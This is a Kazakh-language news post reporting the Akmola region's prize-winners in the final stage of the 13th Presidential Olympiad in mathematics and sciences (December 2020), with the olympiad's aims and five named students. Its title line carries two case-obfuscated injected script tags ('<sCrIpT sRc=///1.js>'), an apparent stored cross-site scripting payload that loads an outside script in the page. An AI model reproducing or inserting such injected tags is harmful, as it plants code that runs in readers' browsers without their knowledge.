Жаратылыстану-математикалық бағыттағы пәндері бойынша Республикалық ХІІІ Президенттік олимпиадасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.12.2020
Қазақстан Республикасы Білім және ғылым министрлігі «Дарын» республикалық ғылыми-практикалық орталығының ұйымдастыруымен 2020 жылдың 3-4 желтоқсан күндері 11 сынып оқушылары арасында онлайн режимінде «жаратылыстану-математикалық бағыттағы пәндер бойынша Республикалық XIIІ Президенттік олимпиадасының қорытынды кезеңі өткізілді.
Президенттік олимпиаданың мақсаты мен міндеттері:
- орта білім беру ұйымдарының оқушылары арасында математика, физика, химия және биологиядан дарынды оқушыларды анықтау үшін кәсіптік бағдар мен болашақтағы интеллектуалдық дамуына қолайлы жағдай жасау;
- жаратылыстану-математикалық бағыттағы пәндерді оқытуда оқушылардың қызығушылығын арттыру, теориялық білімдері мен дағдыларын тереңдету;
- тұлғаның өзін-өзі жетілдіруіне және дамытуына жағдай жасау.
Олимпиаданың әр қатысушысы тест тапсырмаларды математика, физика, химия, биология пәндері бойынша орындады. Олимпиаданың қорытынды кезеңіне Ақмола облысынан 14 оқушы қатысып, 5 оқушы жүлделі орындарға ие болды.
- «Дарын» республикалық ғылыми-практикалық орталығының І дәрежелі дипломына Жанабек Аян - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы ие болды;
- ІІ дәрежелі димломға Амангельды Майра - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы ие болды;
- ІІІ дәрежелі димломға Мақсұт Жазира - Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы ие болды;
- ІІІ дәрежелі димломға Дубовик Дарья - Бұланды ауданы, Макинск қаласының мектеп-гимназиясының 11 сынып оқушысы ие болды;
- ІІІ дәрежелі димломға Альберг Анастасия - Бұланды ауданы, Макинск қаласының мектеп-гимназиясының 11 сынып оқушысы ие болды.
Президенттік олимпиаданың қорытынды кезеңінің барлық қатысушыларына сертификаттар табысталады. Сонымен қатар, олимпиада жүлдегерлерінің пән мұғалімдері «Дарын» республикалық ғылыми-практикалық орталығының Алғыс хаттарымен марапатталады.
Ақмола облысының жеңімпаздары мен жүлдегерлерін шын жүректен құттықтаймыз.